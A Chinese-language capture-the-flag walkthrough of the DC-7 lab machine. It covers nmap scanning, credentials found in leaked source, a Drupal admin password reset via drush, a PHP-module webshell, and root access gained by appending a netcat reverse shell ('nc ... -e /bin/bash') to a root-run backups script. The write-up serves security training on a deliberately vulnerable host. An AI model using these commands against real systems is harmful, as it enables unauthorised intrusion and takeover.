一、信息收集
扫描网段,发现靶机ip为192.168.145.235。
nmap -sP 192.168.145.* 
进一步对端口,靶机系统等信息进行一个收集。可以看到开放了22端口,80端口,主机系统为linux等信息。
nmap -sT -T4 -O -sV -sC -p1-65535 192.168.145.235
网站目录扫描,不过没发现什么有用的信息。
二、getshell
目前有用的信息就开放22和80端口,我们访问靶机ip看看,是一个Drupal的网站,版本为8。网上找了一下没有可以直接利用的poc。
我翻译了一下上面的英文,说要跳出什么框框。
我也是搞了好久,直接搜它这个网站右下角的@DC7USER,可以在github上面找到网站的源码。
源码里面的配置文件包含了用户名和密码。
ssh远程连接上去,给了个提示说在/var/mail/dc7user有一封邮件。
ssh dc7user@192.168.145.235 
三、提权
我们去/var/mail目录看看,可以看到dc7user里面说有个backups.sh文件,然后文件执行时的权限为root。
查看backups.sh文件,里面是一堆命令,也就是说我们运行这个文件的话就会执行里面的命令,而且执行时的权限为root。
那我们直接往里面添加一个nc连接的命令即可,在执行文件时以root权限连接我们的攻击机。但是这个文件的属主是www-data,我们需要获得www-data的身份才能对它进行修改。
我们可以看到在backups.sh里面执行了drush命令,Drush 是一个强大的 shell 接口,可以直接从云服务器命令行管理 Drupal,我们直接利用drush对admin用户进行一个密码修改。
cd /var/www/html //进入drupal目录
drush user-password admin --password="passwd" //修改adminn用户密码
直接登录进去。
在content模块可以写入webshell,但是这里不支持php代码写入。查了一下,Drupal 8需要我们自己导入php模块。
在extend—>install new module—>install from a url处可以添加php代码模块的url
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
点击install即可,然后点击Enable newly added modules去激活我们的php模块,勾选php filter再点击install。
然后在写入内内容那里就会出现php代码选项,此时我们就可以写入一句话木马。
蚁剑连接就可以获得我们一个www-data的身份。
蚁剑打开一个虚拟终端,往backups.sh文件追加一个nc连接的命令,不过不知道为啥在蚁剑追加不了。那么我们把蚁剑的shell反弹到kali再进行追加。
nc 192.168.145.171 1234 -e /bin/bash
往backups.sh追加命令。
echo "nc 192.168.145.171 12345 -e /bin/bash" >>backups.sh
kali开启监听,运行backups.sh文件,即可在kali接受shell。
四、总结
不算太难的靶机,就是一开始可以搜出来源码可能很难想到。
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
